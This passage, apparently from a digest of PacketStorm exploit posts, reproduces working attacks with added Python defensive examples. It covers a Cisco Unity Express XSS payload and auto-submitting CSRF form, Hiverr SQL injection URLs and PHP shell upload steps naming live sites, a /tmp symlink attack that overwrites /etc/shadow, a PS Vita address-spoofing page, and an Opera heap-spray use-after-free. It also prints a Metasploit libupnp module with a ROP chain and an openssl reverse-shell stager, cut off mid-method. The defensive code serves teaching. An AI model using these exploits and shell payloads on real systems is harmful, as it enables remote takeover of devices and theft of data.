        org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source)
        org.apache.tomcat.facade.RequestDispatcherImpl.forward (Unknown Source)
        org.apache.struts.action.ActionServlet.processActionForward (ActionServlet.java:1759)
        org.apache.struts.action.ActionServlet.process (ActionServlet.java:1596)
        com.cisco.aesop.vmgui.framework.WebController.process (WebController.java:157)
        org.apache.struts.action.ActionServlet.doGet (ActionServlet.java:492)
        javax.servlet.http.HttpServlet.service (HttpServlet.java)
        javax.servlet.http.HttpServlet.service (HttpServlet.java)
        org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)
        org.apache.tomcat.core.Handler.invoke (Unknown Source)
        org.apache.tomcat.core.Handler.service (Unknown Source)
        org.apache.tomcat.facade.ServletHandler.service (Unknown Source)
        org.apache.tomcat.core.ContextManager.internalService (Unknown Source)
        org.apache.tomcat.core.ContextManager.service (Unknown Source)
        org.apache.tomcat.modules.server.Http10Interceptor.processConnection (Unknown Source)
        org.apache.tomcat.util.net.TcpWorkerThread.runIt (Unknown Source)
        org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run (Unknown Source)
        java.lang.Thread.run (Thread.java:777)

      POST: Persistent XSS
      http://X.X.X.X/Web/SA3/AddHoliday.do
      POST Data: holiday.description=><script>alert(42)</script>&submitType=ADD

      CSRF - CVE-2013-1120:

      <html>
      <!--
      # Exploit Title: Cisco Unity Express CSRF
      # Date: Discovered and reported December 2012
      # Disclosed: February 2013
      # Author: Jacob Holcomb of Independent Security Evaluators
      # Software: Cisco Unity Express
      # CVE : CVE-2013-1120 for the CSRF
      # Note: All the HTML forms are susceptible to forgery
      -->
      <head>
      <title>Reload Cisco Unity Express CSRF</title>
      </head>
      <body>
      <form name="CUEreload" action="http://X.X.X.X/Web/SA/SaveConfiguration.do" method="post">
      <input type="hidden" name="submitType" value="RELOAD"/>
      </form>
      <script>
      document.CUEreload.submit();
      </script>
      </body>
      </html>

      Source: PacketStorm
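Both the Cisco auto-submitting form above and the Linksys `apply.cgi` GET URL in item 6 succeed because the server honours any request that arrives with the victim's session. This added example (mine, not Cisco's or Linksys's code) models a `SaveConfiguration.do`-style handler before and after the two standard defences: a per-session synchronizer token and an Origin/Referer check, with state changes refused over GET. The origin, session id and form layout are constructed for the demo.

```python
"""Added example: CSRF defence for a state-changing form handler."""
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "http://192.168.1.1"        # assumed origin of the device UI
SERVER_KEY = secrets.token_bytes(32)      # per-process secret, never sent to clients


def issue_csrf_token(session_id: str) -> str:
    """Derive the token from the session id with a server-side HMAC, so it
    is bound to this session and cannot be minted by another origin."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def origin_allowed(headers: dict) -> bool:
    """Accept only requests whose Origin (or Referer, for older clients)
    matches our own origin; a form auto-submitted from attacker.example
    carries the attacker's origin. Missing both headers is treated as
    hostile for state-changing requests."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False
    u = urlsplit(src)
    return f"{u.scheme}://{u.netloc}" == SITE_ORIGIN


def vulnerable_save_configuration(method: str, form: dict, session_id) -> int:
    """Models the advisory's behaviour: any authenticated request is obeyed,
    regardless of who built the form or which method carried it."""
    if not session_id:
        return 401
    return 200 if form.get("submitType") == "RELOAD" else 400


def hardened_save_configuration(method: str, headers: dict, form: dict, session_id) -> int:
    """Same handler with the checks layered in order: authenticated,
    POST only (kills the Linksys GET variant), same origin, valid token."""
    if not session_id:
        return 401
    if method != "POST":
        return 405
    if not origin_allowed(headers):
        return 403
    expected = issue_csrf_token(session_id).encode()
    if not hmac.compare_digest(form.get("csrf_token", "").encode(), expected):
        return 403
    return 200 if form.get("submitType") == "RELOAD" else 400


if __name__ == "__main__":
    sid = "a1b2c3"
    forged = {"submitType": "RELOAD"}                        # the PoC form above
    print("vulnerable:", vulnerable_save_configuration("POST", forged, sid))
    print("hardened  :", hardened_save_configuration("POST", {"Origin": "http://attacker.example"}, forged, sid))
```

The token check alone is sufficient in principle; the Origin check is cheap defence in depth, and the method restriction matters because the Linksys CSRF in item 6 is a plain GET that an `<img>` tag can trigger.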
  13. Hiverr version 2.2 suffers from remote shell upload, information disclosure, and remote SQL injection vulnerabilities.

      # Exploit Title: Hiverr v2.2 Multiple Vulnerabilities
      # Date: 05.02.2013
      # Author: xStarCode
      # Exploit Author: xStarCode
      # Version: 2.2
      # Category: webapps
      # Google Dork: *
      # Tested on: Linux
      # Exploit:

      ----- Index Vulnerabilities:
      ==> SQL Injections
      http://localhost/gig_desc.php?No=-13+UNION+SELECT+version(),2,3,4,5,6,7,8,9,10,11--
      http://localhost/categorygigs.php?category=-0+UNION+SELECT+1,version(),3,4,5,6,7--
      http://localhost/categorygigs.php?category=&mny=-100+UNION+SELECT+version(),2,3,4,5,6,7,8,9,10,11--
      <==

      ----- User Panel Vulnerabilities:
      ==> SQL Injection
      http://localhost/inbox_detail.php?userid=31&recpid=31&gig=-15+UNION+SELECT+1,2,3,version(),5,6,7,8--
      <==

      ----- Multiple Shell Upload:
      ==> Go to http://localhost/profilesetting.php and upload a PHP shell as the "Profile Image".
      View source:
      <img src="profileimage/*****SHELL*****_.php" alt="image" height="100" width="100">
      Go to http://localhost/profileimage/*****SHELL*****_.php
      <==
      next -
      ==> Go to "Greate Gig" at http://localhost/addnewgig.php and upload a PHP shell via "Add Image".
      View source:
      <td width="107"> <img src="gigimages/*****SHELL*****_.php" height="76" width="106"> </td>
      Go to http://localhost/gigimages/*****SHELL*****_.php
      <==

      ----- PHP Info Leak:
      ==> Go to http://localhost/nitintest.php
      <==

      # Demo sites:
      http://trabajoenlinea.net/
      http://aramar.jp/
      http://www.seostinger.com/

      # Author Mail: xstarcode@vpn.st
      # Author Website: www.xstarcode.wordpress.com

      Source: PacketStorm
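The Hiverr shell upload works because the "Profile Image" handler stores whatever the browser sends under its own name in a web-served directory. This added example (mine, not Hiverr code) shows the upload validation that closes that path: decide the type from the file's magic bytes rather than the client's filename, refuse script markers inside the payload, and store under a random server-chosen name. The allowlist and the sample uploads are constructed for the demo; serving the upload directory with script execution disabled is a deployment step the function cannot enforce and is noted in a comment.

```python
"""Added example: image-upload validation that blocks a PHP shell upload."""
import secrets

# Magic-byte allowlist (constructed for this demo): signature -> extension we will store.
ALLOWED_SIGNATURES = {
    b"\xff\xd8\xff": ".jpg",         # JPEG SOI marker
    b"\x89PNG\r\n\x1a\n": ".png",    # PNG signature
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
}
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")   # polyglot heuristic


def sniff_image_type(content: bytes):
    """Return the extension implied by the leading bytes, or None."""
    for magic, ext in ALLOWED_SIGNATURES.items():
        if content.startswith(magic):
            return ext
    return None


def store_profile_image(original_name: str, content: bytes) -> str:
    """Validate an upload and return the name it should be stored under.
    The client's filename is only used in error messages; the stored name is
    random and the extension is the one we determined, so 'shell.php' can
    never land on disk as shell.php. The directory it is written to should
    additionally have script execution turned off in the web server config."""
    ext = sniff_image_type(content)
    if ext is None:
        raise ValueError(f"not an allowed image: {original_name!r}")
    lowered = content.lower()
    if any(marker in lowered for marker in SCRIPT_MARKERS):
        raise ValueError("script marker inside image payload")
    return secrets.token_hex(16) + ext


def upload_accepted(original_name: str, content: bytes) -> bool:
    try:
        store_profile_image(original_name, content)
        return True
    except ValueError:
        return False


# Constructed samples: a one-line web shell and a PNG header stub.
PHP_SHELL = b"<?php system($_GET['c']); ?>"
PNG_STUB = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16

if __name__ == "__main__":
    print("shell.php accepted      :", upload_accepted("shell.php", PHP_SHELL))
    print("shell renamed .jpg      :", upload_accepted("shell.jpg", PHP_SHELL))
    print("PNG with PHP appended   :", upload_accepted("x.png", PNG_STUB + PHP_SHELL))
    print("clean PNG stored as     :", store_profile_image("avatar.png", PNG_STUB))
```

The marker scan is a heuristic, not a parser: its job is to catch the common image-then-PHP polyglot. The controls that actually matter are the random name, the server-chosen extension, and a no-execute upload directory.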
  14. Oracle Auto Service Request creates files insecurely in /tmp using time stamps instead of mkstemp(). Due to this, it is possible to clobber root owned files and possibly cause a denial of service condition or worse.

      The Oracle Auto Service Request software package creates files insecurely in /tmp using time stamps instead of mkstemp(). You can clobber root owned files if you know roughly when the root administrator will be using this utility.

      [larry@oracle-os-lab01 tmp]$ for x in `seq 500 999`; do ln -s /etc/shadow /tmp/status1_020213003$x; done

      root executes the asr command:

      [root@oracle-os-lab01 bin]# ./asr
      register OR register [-e asr-manager-relay-url]: register ASR
      unregister : unregister ASR
      show_reg_status : show ASR registration status
      test_connection : test connection to Oracle
      . . .
      version : show asr script version
      exit
      help : display a list of commands
      ? : display a list of commands
      asr>

      /etc/shadow is now overwritten with the contents of /tmp/status1_020213003722

      root # cat /etc/shadow
      id State Bundle
      68 ACTIVE com.sun.svc.asr.sw_4.3.1 Fragments=69, 70
      69 RESOLVED com.sun.svc.asr.sw-frag_4.3.1 Master=68
      70 RESOLVED com.sun.svc.asr.sw-rulesdefinitions_4.3.1 Master=68
      72 ACTIVE com.sun.svc.asr.sw.http.AsrHttpReceiver_1.0.0 Fragments=73
      73 RESOLVED com.sun.svc.asr.sw.http-frag_1.0.0 Master=72
      67 ACTIVE com.sun.svc.ServiceActivation_4.3.1

      Source: PacketStorm
  15. The Sony Playstation Vita browser that is in firmware version 2.05 suffers from an address bar spoofing vulnerability.

      [MajorSecurity-SA-2013-014] Sony Playstation Vita Browser - firmware 2.05 - Address bar spoofing

      Details
      =============
      Product: Sony Playstation Vita Browser - firmware 2.05
      CVE-ID: CVE-2013-XXXX
      Security-Risk: moderate
      Remote-Exploit: yes
      Vendor-URL: http://de.playstation.com/psvita/
      Advisory-Status: published

      Credits
      =============
      Discovered by: David Vieira-Kurz of MajorSecurity
      original advisory: http://majorsecurity.com/psvita/sa-2013-014-en.php

      Affected Products
      =============
      Sony Playstation Vita Browser ( Firmware: 2.05 )
      Prior versions may also be affected

      Product Description
      =============
      "Playstation Vita is the new handheld of Sony."

      Vulnerability Details
      =============
      David Vieira-Kurz has discovered some vulnerabilities in the Sony PS Vita based on firmware 2.05. The weakness is caused by an error within the handling of URLs when using JavaScript's window.open() method. This can be exploited to potentially trick users into supplying sensitive information to a malicious web site, because the information displayed in the address bar can be constructed in a certain way, which may lead users to believe that they're visiting a web site other than the one actually displayed.

      Steps to reproduce
      =============
      1) Visit http://majorsecurity.com/psvita/psvita-demo.html with a PS Vita with firmware 2.05 installed
      2) Click the "demo" button
      3) The web browser will open a new window with "http://de.playstation.com/psvita/" in the address bar, but in fact "http://de.playstation.com/psvita/" is being displayed inside an iframe within the host http://www.majorsecurity.com

      Proof of Concept
      =============
      A proof-of-concept code is available here: http://de.playstation.com/psvita/

      Solution
      =============
      Users should upgrade to a newer version as soon as the vendor has supplied a patch.

      Timeline
      ================
      2013-01-20, vulnerability identified
      2013-01-20, vulnerability reproduced with firmware 2.05
      2013-01-20, vendor has been informed
      2013-01-27, vendor has been informed once again
      2013-01-29, advisory published with partial details
      2013-02-05, advisory published with full details and PoC

      Use of terms
      ================
      Unaltered electronic reproduction of this advisory is permitted. For all other reproduction or publication, in printing or otherwise, contact us for permission. Use of the advisory constitutes acceptance for use in an "as is" condition. All warranties are excluded. In no event shall MajorSecurity be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if MajorSecurity has been advised of the possibility of such damages.

      -------------------------
      PROOF OF CONCEPT CODE
      -------------------------
      <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
      <html>
      <head>
      <title>Sony PS Vita - firmware 2.05 - address bar spoofing</title>
      <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
      <!-- Copyright 2013 David Vieira-Kurz and MajorSecurity GmbH -->
      </head>
      <body>
      <h1>Sony PS Vita - firmware 2.05 - address bar spoofing</h1>
      <li>Please click the button to run the proof of concept. <button id="one">Demo</button></li>
      <script type="text/javascript">
      document.getElementById('one').onclick = function() {
        // Open the target URL so the address bar shows it ...
        myWindow = window.open('http://de.playstation.com/psvita/', 'Playstation Vita, PS Vita', 'width=200,height=100,location=yes');
        // ... then write into the new window's initial (still same-origin) document
        // before the navigation commits; the bar keeps showing the requested URL.
        myWindow.document.write("<html><head></head><body><b>This page is still being hosted on majorsecurity.com, but the address bar is pointing to another domain.</b><br><br><iframe src=\"http://de.playstation.com/psvita/\"></iframe></body></html>");
        myWindow.focus();
        return false;
      }
      </script>
      </body>
      </html>

      Source: PacketStorm
  16. DataLife Engine versions 9.7 and below appear to suffer from a session fixation vulnerability.

      -----------------------------------------------------------
      (PT-2012-53) Positive Technologies Security Advisory
      Privilege Gaining in DataLife Engine
      -----------------------------------------------------------

      ---[ Vulnerable software ]
      DataLife Engine
      Version: 9.7 and earlier
      Application link: http://dle-news.ru/

      ---[ Severity level ]
      Severity level: Medium
      Impact: Privilege gaining
      Access Vector: Remote
      CVSS v2:
      Base Score: 6.8
      Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:P)
      CVE: not assigned

      ---[ Software description ]
      DataLife Engine is a website management system.

      ---[ Vulnerability description ]
      Positive Technologies experts have detected a session management vulnerability that allows attackers to conduct a Session Fixation attack in DataLife Engine. Session cookies are not discarded, which allows attackers to conduct the attack. An attacker with access to the evil.host.ru subdomain (or using Cross-Site Scripting) is able to set Cookie: PHPSESSID=123; domain=.host.ru in the user's browser and, once logged in to dle.host.ru, the user can use the 123 session, which now has the privileges of the authorized user.

      ---[ How to fix ]
      Update your software to the latest version.

      ---[ Advisory status ]
      30.10.2012 - Vendor is notified
      30.10.2012 - Vendor gets vulnerability details
      19.01.2013 - Vendor releases fixed version and details
      04.02.2013 - Public disclosure

      ---[ Credits ]
      The vulnerability was discovered by Timur Yunusov, Positive Research Center (Positive Technologies Company)

      ---[ References ]
      http://en.securitylab.ru/lab/PT-2012-53
      http://dle-news.ru/bags/v97/1549-patchi-bezopasnosti-dlya-versii-97.html

      Reports on the vulnerabilities previously discovered by Positive Research:
      http://ptsecurity.com/research/advisory/
      http://en.securitylab.ru/lab/

      ---[ About Positive Technologies ]
      Positive Technologies www.ptsecurity.com is among the key players in the IT security market in Russia. The principal activities of the company include the development of integrated tools for information security monitoring (MaxPatrol); providing IT security consulting services and technical support; development of the Securitylab leading Russian information security portal. Among the clients of Positive Technologies, there are more than 40 state enterprises, more than 50 banks and financial organizations, 20 telecommunication companies, more than 40 plant facilities, as well as IT, service and retail companies from Russia, the CIS countries, the Baltic States, China, Ecuador, Germany, Great Britain, Holland, Iran, Israel, Japan, Mexico, the Republic of South Africa, Thailand, Turkey, and the USA. Positive Technologies is a team of highly skilled developers, advisers and experts with years of vast hands-on experience. The company specialists possess professional titles and certificates; they are the members of various international societies and are actively involved in the IT security field development.

      Source: PacketStorm
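The session fixation scenario in the advisory above, modelled as an added example (Python stand-in, not DataLife Engine's PHP code): a planted `PHPSESSID=123` becomes the victim's authenticated session when login keeps whatever ID the browser presents, and stops working once login issues a fresh ID and unknown IDs are never adopted. The store, the `login_*` handlers and the `scenario()` driver are all constructed for the demo.

```python
"""Added example (not from the advisory): session fixation and its fix,
modelled with a minimal server-side session store.

The attacker plants "PHPSESSID=123; domain=.host.ru" from a sibling
subdomain (evil.host.ru) or via XSS.  A login handler that keeps the ID the
browser presents turns that planted ID into an authenticated session the
attacker already knows.  Regenerating the ID on login, and refusing to adopt
IDs the server never issued, removes the problem.
"""
import secrets


class SessionStore:
    def __init__(self, strict=False):
        self.sessions = {}    # session id -> session data
        self.strict = strict  # True: never adopt an id the server did not issue

    def new_session(self):
        sid = secrets.token_hex(16)
        self.sessions[sid] = {}
        return sid

    def resolve(self, presented_sid):
        """Map the cookie value from the request to a server-side session."""
        if presented_sid in self.sessions:
            return presented_sid
        if self.strict or presented_sid is None:
            return self.new_session()
        # Permissive behaviour (PHP's default): adopt the unknown id as-is.
        self.sessions[presented_sid] = {}
        return presented_sid

    def login_vulnerable(self, presented_sid, user):
        """Fixation: the id the attacker planted becomes the logged-in one."""
        sid = self.resolve(presented_sid)
        self.sessions[sid]["user"] = user
        return sid

    def login_fixed(self, presented_sid, user):
        """Fix: discard the presented session and issue a fresh id on login
        (session_regenerate_id(true) in PHP terms), carrying nothing over."""
        old = self.resolve(presented_sid)
        self.sessions.pop(old, None)
        sid = self.new_session()
        self.sessions[sid]["user"] = user
        return sid

    def whoami(self, sid):
        return self.sessions.get(sid, {}).get("user")


def scenario(fixed):
    """Attacker plants sid "123"; the victim logs in with that cookie; the
    attacker then presents "123" themselves.  Returns what the attacker gets."""
    store = SessionStore(strict=fixed)
    planted = "123"
    if fixed:
        store.login_fixed(planted, "victim")
    else:
        store.login_vulnerable(planted, "victim")
    return store.whoami(planted)
```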
  17. Opera appears to suffer from an SVG use-after-free vulnerability.

      <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w0.org/1999/xlink">
      <g id="group">
      <defs>
      <clipPath id="clip-circle" clip-path="url(#clip-rect)">
      </clipPath>
      <clipPath id="clip-rect">
      </clipPath>
      </defs>
      <circle id="rect" x="10" y="10" width="100" height="100" fill="green" />
      </g>
      <script><![CDATA[
      //Author=Cons0ul
      var b = new Array();
      // this is our spray function where spray is allocated on LFH with exact size 0x78
      // so 0x78 size of block is created so far we are creating 0x50000 blocks
      // to create 0x78 blocks we are using ArrayBuffer();
      function feng_shui(){
        for(i=0;i<1000;i++)window.opera.collect(); // <----- garbage collection
        for(i=0;i<0x50000;i++){
          payload = new ArrayBuffer(0x78) // use 0xb0 for 64bit machine
          payload[0]=0x6c
          payload[1]=0x03
          payload[2]=0xfe
          payload[3]=0x7f
          b.push(payload)
        }
      }
      // bug is use after free in handling of (use tag + clippath) which tries to access freed object
      // document.getElementById('rect').setAttribute('clip-path',"url(#clip-circle)");
      var c = document.createElement('use');
      c.setAttribute("xlink:href","rect")
      feng_shui();
      document.getElementById('clip-rect').appendChild(c);
      document.getElementById('rect').style.clipPath="url(#clip-circle)" // <----- bug
      window.opera.collect() // <------ gc() frees the allocation
      feng_shui(); // <------------ we allocate our code at freed memory
      // at the end it tries freed block which contains our data
      window.location.href=window.location.href;
      /*
      idc !heap -p -a ecx
      address 077c45e0 found in _HEAP @ b40000
      HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
      077c45d8 0010 0000 [00] 077c45e0 00078 - (free)
      PS C:\Users\cons0ul> idc db ecx
      077c45e0 92 48 fe 7f 00 00 00 00-00 00 00 00 00 00 00 00 .H..............
      077c45f0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
      077c4600 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
      077c4610 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
      077c4620 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
      077c4630 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
      077c4640 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
      077c4650 00 00 00 00 00 00 00 00-89 d0 6a 5b 00 00 00 88 ..........j[....
      PS C:\Users\cons0ul> idc r
      eax=7ffe4892 ebx=00000001 ecx=077c45e0 edx=00000000 esi=0372e590 edi=01d40048
      eip=6b8c998b esp=0013e334 ebp=00000000 iopl=0 nv up ei pl nz na po nc
      cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
      Opera_6b430000!OpGetNextUninstallFile+0xf8583:
      6b8c998b ff5008 call dword ptr [eax+8] ds:0023:7ffe489a=????????
      */
      ]]></script>
      </svg>

      Source: PacketStorm
  18. Description: SCADA HMI software provides a "control panel" interface to SCADA/ICS systems, allowing system operators and engineers the capability to visually monitor and make changes to parameters in the system. Many HMI packages provide the ability to authenticate users, to allow access to dangerous or sensitive controls and data to specific users, while restricting other users to observation or less sensitive areas of the system.

      Microsoft Bob was a failed Microsoft project from 1995: an attempt to make computers easy for end-users by providing a non-technical captive interface of "rooms" that users could move around, use to launch programs, and store files. Cartoon guides helped users with every step of the way. Thanks to an overly-helpful cartoon dog that would offer to change your password for you if you forgot it, it's frequently used as an example of bad security design choices.

      In this presentation, Wesley will point out the similarities and differences between Microsoft Bob and SCADA HMI software, and demonstrate previously unpublished vulnerabilities in the HMI systems that are very reminiscent of the problems with Microsoft Bob (which will also be demonstrated!). For penetration testers, the techniques used to quickly identify these vulnerabilities will be discussed, as well as mitigations for those who have to defend such systems.

      Robert McGrew is currently a lecturer and researcher at Mississippi State University's National Forensics Training Center, which provides free digital forensics training to law enforcement and wounded veterans. He has interests in both penetration testing and digital forensics, resulting in some interesting combinations of the two. He has written tools useful to both fields (NBNSpoof, msramdmp, GooSweep), and tries to stay involved and interactive with the online infosec community. He is currently expanding and exposing the rest of the security community to the SCADA HMI research he began with the release of user authentication vulnerabilities in the iFIX HMI product.

      Twitter: @McGrewSecurity

      Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

      Original Source: Source: Scada Hmi And Microsoft Bob: Modern Authentication Flaws With A 90'S Flavor
  19. This Metasploit module exploits a buffer overflow in the unique_service_name() function of libupnp's SSDP processor. The libupnp library is used across thousands of devices and is referred to as the Intel SDK for UPnP Devices or the Portable SDK for UPnP Devices. Due to size limitations on many devices, this exploit uses a separate TCP listener to stage the real payload.

      ##
      # This file is part of the Metasploit Framework and may be subject to
      # redistribution and commercial restrictions. Please see the Metasploit
      # web site for more information on licensing and terms of use.
      # http://metasploit.com/
      ##

      require 'msf/core'

      class Metasploit3 < Msf::Exploit::Remote
        Rank = NormalRanking

        def initialize(info = {})
          super(update_info(info,
            'Name'           => 'Portable UPnP SDK unique_service_name() Remote Code Execution',
            'Description'    => %q{
              This module exploits a buffer overflow in the unique_service_name()
              function of libupnp's SSDP processor. The libupnp library is used across
              thousands of devices and is referred to as the Intel SDK for UPnP Devices
              or the Portable SDK for UPnP Devices. Due to size limitations on many
              devices, this exploit uses a separate TCP listener to stage the real payload.
            },
            'Author'         =>
              [
                'hdm',                                               # Exploit dev for Supermicro IPMI
                'Alex Eubanks <endeavor[at]rainbowsandpwnies.com>',  # Exploit dev for Supermicro IPMI
                'Richard Harman <richard[at]richardharman.com>'      # Binaries, system info, testing for Supermicro IPMI
              ],
            'License'        => MSF_LICENSE,
            'References'     =>
              [
                [ 'CVE', '2012-5858' ],
                [ 'US-CERT-VU', '922681' ],
                [ 'URL', 'https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play' ]
              ],
            'Platform'       => ['unix'],
            'Arch'           => ARCH_CMD,
            'Privileged'     => true,
            'Payload'        =>
              {
                #
                # The following BadChars do not apply since we stage the payload
                # through a secondary connection. This is just for reference.
                #
                # 'BadChars' =>
                #   # Bytes 0-8 are not allowed
                #   [*(0..8)].pack("C*") +
                #   # 0x09, 0x0a, 0x0d are allowed
                #   "\x0b\x0c\x0e\x0f" +
                #   # All remaining bytes up to space are restricted
                #   [*(0x10..0x1f)].pack("C*") +
                #   # Also not allowed
                #   "\x7f\x3a" +
                #   # Breaks our string quoting
                #   "\x22",

                # Unlimited since we stage this over a secondary connection
                'Space'       => 8000,
                'DisableNops' => true,
                'Compat'      =>
                  {
                    'PayloadType' => 'cmd', # specific payloads vary widely by device (openssl for IPMI, etc)
                  }
              },
            'Targets'        =>
              [
                [ "Automatic", { } ],

                #
                # ROP targets are difficult to represent in the hash, use callbacks instead
                #
                [ "Supermicro Onboard IPMI (X9SCL/X9SCM) Intel SDK 1.3.1", {
                    # The callback handles all target-specific settings
                    :callback => :target_supermicro_ipmi_131,
                    # This matches any line of the SSDP M-SEARCH response
                    :fingerprint => /Server:\s*Linux\/2\.6\.17\.WB_WPCM450\.1\.3 UPnP\/1\.0, Intel SDK for UPnP devices\/1\.3\.1/mi
                    #
                    # SSDP response:
                    #   Linux/2.6.17.WB_WPCM450.1.3 UPnP/1.0, Intel SDK for UPnP devices/1.3.1
                    #   http://192.168.xx.xx:49152/IPMIdevicedesc.xml
                    #   uuid:Upnp-IPMI-1_0-1234567890001::upnp:rootdevice
                    # Approximately 35,000 of these found in the wild via critical.io scans (2013-02-03)
                  }
                ],

                [ "Debug Target", {
                    # The callback handles all target-specific settings
                    :callback => :target_debug
                  }
                ]
              ],
            'DefaultTarget'  => 0,
            'DisclosureDate' => 'Jan 29 2013'))

          register_options(
            [
              Opt::RHOST(),
              Opt::RPORT(1900),
              OptAddress.new('CBHOST', [ false, "The listener address used for staging the real payload" ]),
              OptPort.new('CBPORT', [ false, "The listener port used for staging the real payload" ])
            ], self.class)
        end

        def exploit
          configure_socket

          target_info = choose_target

          unless self.respond_to?(target_info[:callback])
            print_error("Invalid target specified: no callback function defined")
            return
          end

          buffer = self.send(target_info[:callback])

          pkt =
            "M-SEARCH * HTTP/1.1\r\n" +
            "Host:239.255.255.250:1900\r\n" +
            "ST:uuid:schemas:device:" + buffer + ":end\r\n" +
            "Man:\"ssdp:discover\"\r\n" +
            "MX:3\r\n\r\n"

          print_status("Exploiting #{rhost} with target '#{target_info.name}' with #{pkt.length} bytes to port #{rport}...")

          r = udp_sock.sendto(pkt, rhost, rport, 0)

          1.upto(5) do
            ::IO.select(nil, nil, nil, 1)
            break if session_created?
          end

          # No handler() support right now
        end

        # These devices are armle, run version 1.3.1 of libupnp, have random stacks, but no PIE on libc
        def target_supermicro_ipmi_131

          # Create a fixed-size buffer for the payload
          buffer = Rex::Text.rand_text_alpha(2000)

          # Place the entire buffer inside of double-quotes to take advantage of is_qdtext_char()
          buffer[0,1]    = '"'
          buffer[1999,1] = '"'

          # Prefer CBHOST, but use LHOST, or autodetect the IP otherwise
          cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST'])

          # Start a listener
          start_listener(true)

          # Figure out the port we picked
          cbport = self.service.getsockname[2]

          # Restart the service and use openssl to stage the real payload
          # Staged because only ~150 bytes of contiguous data are available before mangling
          cmd = "sleep 1;/bin/upnp_dev & echo; openssl s_client -quiet -host #{cbhost} -port #{cbport}|/bin/sh;exit;#"
          buffer[432, cmd.length] = cmd

          # Adjust $r3 to point from the bottom of the stack back into our buffer
          buffer[304,4] = [0x4009daf8].pack("V")
          #
          # 0x4009daf8: add r3, r3, r4, lsl #2
          # 0x4009dafc: ldr r0, [r3, #512] ; 0x200
          # 0x4009db00: pop {r4, r10, pc}

          # The offset (right-shifted by 2 ) to our command string above
          buffer[284,4] = [0xfffffe78].pack("V")
          #

          # Copy $r3 into $r0
          buffer[316,4] = [0x400db0ac].pack("V")
          # 0x400db0ac <_IO_wfile_underflow+1184>: sub r0, r3, #1
          # 0x400db0b0 <_IO_wfile_underflow+1188>: pop {pc} ; (ldr pc, [sp], #4)

          # Move our stack pointer down so as not to corrupt our payload
          buffer[320,4] = [0x400a5568].pack("V")
          # 0x400a5568 <__default_rt_sa_restorer_v2+5448>: add sp, sp, #408 ; 0x198
          # 0x400a556c <__default_rt_sa_restorer_v2+5452>: pop {r4, r5, pc}

          # Finally return to system() with $r0 pointing to our string
          buffer[141,4] = [0x400add8c].pack("V")

          return buffer

      =begin
      00008000-00029000 r-xp 00000000 08:01 709233 /bin/upnp_dev
      00031000-00032000 rwxp 00021000 08:01 709233 /bin/upnp_dev
      00032000-00055000 rwxp 00000000 00:00 0 [heap]
      40000000-40015000 r-xp 00000000 08:01 709562 /lib/ld-2.3.5.so
      40015000-40017000 rwxp 00000000 00:00 0
      4001c000-4001d000 r-xp 00014000 08:01 709562 /lib/ld-2.3.5.so
      4001d000-4001e000 rwxp 00015000 08:01 709562 /lib/ld-2.3.5.so
      4001e000-4002d000 r-xp 00000000 08:01 709535 /lib/libpthread-0.10.so
      4002d000-40034000 ---p 0000f000 08:01 709535 /lib/libpthread-0.10.so
      40034000-40035000 r-xp 0000e000 08:01 709535 /lib/libpthread-0.10.so
      40035000-40036000 rwxp 0000f000 08:01 709535 /lib/libpthread-0.10.so
      40036000-40078000 rwxp 00000000 00:00 0
      40078000-40180000 r-xp 00000000 08:01 709620 /lib/libc-2.3.5.so
      40180000-40182000 r-xp 00108000 08:01 709620 /lib/libc-2.3.5.so
      40182000-40185000 rwxp 0010a000 08:01 709620 /lib/libc-2.3.5.so
      40185000-40187000 rwxp 00000000 00:00 0
      bd600000-bd601000 ---p 00000000 00:00 0
      bd601000-bd800000 rwxp 00000000 00:00 0
      bd800000-bd801000 ---p 00000000 00:00 0
      bd801000-bda00000 rwxp 00000000 00:00 0
      bdc00000-bdc01000 ---p 00000000 00:00 0
      bdc01000-bde00000 rwxp 00000000 00:00 0
      be000000-be001000 ---p 00000000 00:00 0
      be001000-be200000 rwxp 00000000 00:00 0
      be941000-be956000 rwxp 00000000 00:00 0 [stack]
      =end
        end

        # Generate a buffer that provides a starting point for exploit development
        def target_debug
          buffer = Rex::Text.pattern_create(2000)
        end

        def stage_real_payload(cli)
          print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...")
          cli.put(payload.encoded + "\n")
        end

        def start_listener(ssl = false)
          comm = datastore['ListenerComm']
          if comm == "local"
            comm = ::Rex::Socket::Comm::Local
          else
            comm = nil
          end

          self.service = Rex::Socket::TcpServer.create(
            'LocalPort' => datastore['CBPORT'],
            'SSL'       => ssl,
            'SSLCert'   => datastore['SSLCert'],
            'Comm'      => comm,
            'Context'   =>
              {
                'Msf'        => framework,
                'MsfExploit' => self,
              })

          self.service.on_client_connect_proc = Proc.new { |client|
            stage_real_payload(client)
          }

          # Start the listening service
          self.service.start
        end

        #
        # Shut down any running services
        #
        def cleanup
          super
          if self.service
            print_status("Shutting down payload stager listener...")
            begin
